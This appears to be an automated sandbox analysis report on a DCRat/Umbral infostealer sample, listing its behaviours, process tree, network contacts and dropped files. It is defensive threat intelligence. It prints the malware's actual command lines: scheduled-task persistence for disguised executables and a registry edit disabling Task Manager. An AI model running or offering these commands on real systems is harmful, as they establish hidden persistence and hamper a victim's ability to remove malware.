Malware Analysis Report

2024-10-10 10:09

Sample ID 240505-bvm8bade58
Target 898a94f29edc228ce3bd2054f3d5d6dd.bin
SHA256 4174a9073fea7b22d8a973e2891d996b7d5b0eb94a85c538cd7da1a2c4c1e9c7
Tags
dcrat umbral evasion infostealer rat stealer execution spyware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

4174a9073fea7b22d8a973e2891d996b7d5b0eb94a85c538cd7da1a2c4c1e9c7

Threat Level: Known bad

The file 898a94f29edc228ce3bd2054f3d5d6dd.bin was found to be: Known bad.

Malicious Activity Summary

dcrat umbral evasion infostealer rat stealer execution spyware

Umbral

Detect Umbral payload

DcRat

Process spawned unexpected child process

DCRat payload

Drops file in Drivers directory

Command and Scripting Interpreter: PowerShell

Disables Task Manager via registry modification

Checks computer location settings

Reads user/profile data of web browsers

Loads dropped DLL

Executes dropped EXE

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Drops file in Program Files directory

Drops file in Windows directory

Unsigned PE

Enumerates physical storage devices

Modifies registry key

Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API

Creates scheduled task(s)

Modifies registry class

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Views/modifies file attributes

Detects videocard installed

Runs ping.exe

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-05 01:28

Signatures

Unsigned PE

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-05 01:28

Reported

2024-05-05 01:30

Platform

win7-20240221-en

Max time kernel

149s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe"

Signatures

DcRat

rat infostealer dcrat

Detect Umbral payload

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe

Umbral

stealer umbral

DCRat payload

rat

Disables Task Manager via registry modification

evasion

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Windows Mail\de-DE\wininit.exe C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Program Files (x86)\Windows Mail\de-DE\56085415360792 C:\MsWinsessiondllNet\driverBrokercommon.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\inf\conhost.exe C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File opened for modification C:\Windows\inf\conhost.exe C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Windows\inf\088424020bedd6 C:\MsWinsessiondllNet\driverBrokercommon.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\Windows\inf\conhost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe N/A
Token: SeDebugPrivilege N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\inf\conhost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2892 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe C:\Users\Admin\AppData\Local\Temp\stealer.exe
PID 2892 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe C:\Users\Admin\AppData\Local\Temp\чекер dc.exe
PID 2892 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe C:\Users\Admin\AppData\Local\Temp\Inject.exe
PID 2644 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\чекер dc.exe C:\Windows\SysWOW64\WScript.exe
PID 2536 wrote to memory of 2984 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2984 wrote to memory of 1652 N/A C:\Windows\SysWOW64\cmd.exe C:\MsWinsessiondllNet\driverBrokercommon.exe
PID 2508 wrote to memory of 2348 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\System32\Wbem\wmic.exe
PID 1652 wrote to memory of 768 N/A C:\MsWinsessiondllNet\driverBrokercommon.exe C:\Windows\System32\cmd.exe
PID 2984 wrote to memory of 2852 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 768 wrote to memory of 940 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\w32tm.exe
PID 768 wrote to memory of 2460 N/A C:\Windows\System32\cmd.exe C:\Windows\inf\conhost.exe
PID 2460 wrote to memory of 1096 N/A C:\Windows\inf\conhost.exe C:\Windows\System32\WScript.exe
PID 2460 wrote to memory of 1216 N/A C:\Windows\inf\conhost.exe C:\Windows\System32\WScript.exe
PID 1096 wrote to memory of 3044 N/A C:\Windows\System32\WScript.exe C:\Windows\inf\conhost.exe
PID 3044 wrote to memory of 3060 N/A C:\Windows\inf\conhost.exe C:\Windows\System32\WScript.exe
PID 3044 wrote to memory of 1144 N/A C:\Windows\inf\conhost.exe C:\Windows\System32\WScript.exe
PID 3060 wrote to memory of 2504 N/A C:\Windows\System32\WScript.exe C:\Windows\inf\conhost.exe
PID 2504 wrote to memory of 2808 N/A C:\Windows\inf\conhost.exe C:\Windows\System32\WScript.exe
PID 2504 wrote to memory of 2856 N/A C:\Windows\inf\conhost.exe C:\Windows\System32\WScript.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe

"C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe"

C:\Users\Admin\AppData\Local\Temp\stealer.exe

"C:\Users\Admin\AppData\Local\Temp\stealer.exe"

C:\Users\Admin\AppData\Local\Temp\чекер dc.exe

"C:\Users\Admin\AppData\Local\Temp\чекер dc.exe"

C:\Users\Admin\AppData\Local\Temp\Inject.exe

"C:\Users\Admin\AppData\Local\Temp\Inject.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\MsWinsessiondllNet\zHYxYvywzA0UOqnH8B4aBgoRvO2C5.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\MsWinsessiondllNet\q6hjn2OvCg2VETYAoy3FIOj.bat" "

C:\MsWinsessiondllNet\driverBrokercommon.exe

"C:\MsWinsessiondllNet\driverBrokercommon.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Windows\inf\conhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\inf\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Windows\inf\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Windows Mail\de-DE\wininit.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Mail\de-DE\wininit.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Mail\de-DE\wininit.exe'" /rl HIGHEST /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\UaJRNF11a2.bat"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\inf\conhost.exe

"C:\Windows\inf\conhost.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0a0a1e6e-5481-4639-ae8b-5fea2ac76621.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\93f16f6c-47c0-4cae-90c5-45b4dc351db8.vbs"

C:\Windows\inf\conhost.exe

C:\Windows\inf\conhost.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0cd5995c-5c03-4040-b512-619c1eccbcb3.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6244d727-ed45-43e8-ad89-3c478c88af5c.vbs"

C:\Windows\inf\conhost.exe

C:\Windows\inf\conhost.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d78b4399-8139-4837-973a-f2f0f90fe745.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5ac14dba-f1e7-43c2-8a6c-dda8c9a7323c.vbs"

C:\Windows\inf\conhost.exe

C:\Windows\inf\conhost.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9e1306a1-7d80-41d9-a54a-66f1727dc77c.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d5150883-ed23-4482-a854-c5a2a66d82ea.vbs"

C:\Windows\inf\conhost.exe

C:\Windows\inf\conhost.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2b170f59-441c-4133-a8dc-1297c5cdbc6a.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b02fd538-2945-43e5-a920-0034d7675f77.vbs"

C:\Windows\inf\conhost.exe

C:\Windows\inf\conhost.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c1b0d6d0-77d3-4654-9345-549cd621ce7f.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e7714cb1-5e00-45fe-a1f0-ae5b007ec77b.vbs"

C:\Windows\inf\conhost.exe

C:\Windows\inf\conhost.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7b4f4761-f16f-4de3-b5fb-0923ce7bdfea.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ae17c003-b5fe-4f4f-be48-34d5b9eac8fe.vbs"

C:\Windows\inf\conhost.exe

C:\Windows\inf\conhost.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\39f25686-6a3e-4eda-875d-a5be55c4b30d.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\dd645dac-b7c5-44f9-a4a4-3ff1610dd827.vbs"

C:\Windows\inf\conhost.exe

C:\Windows\inf\conhost.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9c5e5929-4054-4c15-bacf-e767c8424da0.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\51387e81-ee66-446b-a46a-d0e3ed1d0595.vbs"

C:\Windows\inf\conhost.exe

C:\Windows\inf\conhost.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\54d1267b-f558-4723-a5e9-e5e7f7b12168.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6139caac-670c-420e-a75c-fa399d21bd69.vbs"

C:\Windows\inf\conhost.exe

C:\Windows\inf\conhost.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e2128f3e-4b1b-4b82-b696-70ee170e0496.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\799571d0-feee-4ef0-a2bd-927a43a01780.vbs"

Network

Country Destination Domain Proto
US 8.8.8.8:53 gstatic.com udp
GB 216.58.201.99:443 gstatic.com tcp
US 8.8.8.8:53 a0947008.xsph.ru udp
RU 141.8.192.103:80 a0947008.xsph.ru tcp

Files

\Users\Admin\AppData\Local\Temp\stealer.exe

\Users\Admin\AppData\Local\Temp\чекер dc.exe

\Users\Admin\AppData\Local\Temp\Inject.exe

C:\MsWinsessiondllNet\zHYxYvywzA0UOqnH8B4aBgoRvO2C5.vbe

C:\MsWinsessiondllNet\q6hjn2OvCg2VETYAoy3FIOj.bat

C:\MsWinsessiondllNet\driverBrokercommon.exe

C:\Users\Admin\AppData\Local\Temp\UaJRNF11a2.bat

C:\Users\Admin\AppData\Local\Temp\0a0a1e6e-5481-4639-ae8b-5fea2ac76621.vbs

C:\Users\Admin\AppData\Local\Temp\93f16f6c-47c0-4cae-90c5-45b4dc351db8.vbs

C:\Users\Admin\AppData\Local\Temp\0cd5995c-5c03-4040-b512-619c1eccbcb3.vbs

C:\Users\Admin\AppData\Local\Temp\d78b4399-8139-4837-973a-f2f0f90fe745.vbs

C:\Users\Admin\AppData\Local\Temp\9e1306a1-7d80-41d9-a54a-66f1727dc77c.vbs

C:\Users\Admin\AppData\Local\Temp\2b170f59-441c-4133-a8dc-1297c5cdbc6a.vbs

C:\Users\Admin\AppData\Local\Temp\c1b0d6d0-77d3-4654-9345-549cd621ce7f.vbs

C:\Users\Admin\AppData\Local\Temp\7b4f4761-f16f-4de3-b5fb-0923ce7bdfea.vbs

C:\Users\Admin\AppData\Local\Temp\39f25686-6a3e-4eda-875d-a5be55c4b30d.vbs

C:\Users\Admin\AppData\Local\Temp\9c5e5929-4054-4c15-bacf-e767c8424da0.vbs

MD5 4b6b46eab9c52b28d9814e7abd31baaf
SHA1 bafcefe324854d398d6f8bb506d593f59a72c3bf
SHA256 58c2bb82bf82371de06c2d3a7cad22c24e5f9e4bd94f4bf415436d5b1cc2f395
SHA512 24b6981da8cde1d9be8ddad6e5feb7c9e2a4f1b90cf2c84f5f7f4393cefcfe70a70801e16ed5aa26b008907608280297aeb565c993e7590d2149c93dbe693692

C:\Users\Admin\AppData\Local\Temp\54d1267b-f558-4723-a5e9-e5e7f7b12168.vbs

MD5 dcee4dce741bd20ca0db644c2c5e46e7
SHA1 11db5b4398b3f46aee65d3381bde7ba7143c22d6
SHA256 6d725edfb7ccbf27477df652f4334171a691e9c731681c805a7d84ebd9269177
SHA512 24efe9c8faea46acf6d3f5692ad6fb1292fd065e87196ca7cf4b46eec1ce17619936cb81a053b289ca7451e32b83f139dd12554497ef8374628fdc563907553d

C:\Users\Admin\AppData\Local\Temp\e2128f3e-4b1b-4b82-b696-70ee170e0496.vbs

MD5 ee5ef58333c9ac975005e403469f5ad9
SHA1 9ce58c735d017f14510772fb4d44528177509c59
SHA256 7d83e686176e73272f93deb3a961be58d15414f0b24fff41b12a83a2771635b6
SHA512 94d418bac88c3e2a15a12a3157fdf5a43b434302a958813af47ffff74dcfdec8695e8566d07292246b43d3a47f2233c6e31deb2345be736a99f906a0ebd9e2b1

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-05 01:28

Reported

2024-05-05 01:30

Platform

win10v2004-20240419-en

Max time kernel

150s

Max time network

143s

Command Line

"C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe"

Signatures

DcRat

rat infostealer dcrat

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe

Umbral

stealer umbral

DCRat payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Disables Task Manager via registry modification

evasion

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\stealer.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\чекер dc.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation C:\Users\All Users\OfficeClickToRun.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation C:\Users\All Users\OfficeClickToRun.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation C:\Users\All Users\OfficeClickToRun.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation C:\Users\All Users\OfficeClickToRun.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation C:\Users\All Users\OfficeClickToRun.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation C:\Users\All Users\OfficeClickToRun.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation C:\Users\All Users\OfficeClickToRun.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation C:\Users\All Users\OfficeClickToRun.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation C:\Users\All Users\OfficeClickToRun.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation C:\Users\All Users\OfficeClickToRun.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation C:\Users\All Users\OfficeClickToRun.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation C:\Users\All Users\OfficeClickToRun.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation C:\Users\All Users\OfficeClickToRun.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation C:\Users\All Users\OfficeClickToRun.exe N/A

Reads user/profile data of web browsers

spyware stealer

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Internet Explorer\en-US\f3b6ecef712a24 C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Program Files (x86)\Windows Multimedia Platform\wininit.exe C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Program Files (x86)\Common Files\6cb0b6c459d5d3 C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Program Files (x86)\Windows Photo Viewer\uk-UA\smss.exe C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Program Files (x86)\Windows Photo Viewer\uk-UA\69ddcba757bf72 C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Program Files\Microsoft Office 15\ClientX64\backgroundTaskHost.exe C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Program Files\Microsoft Office 15\ClientX64\eddb19405b7ce1 C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
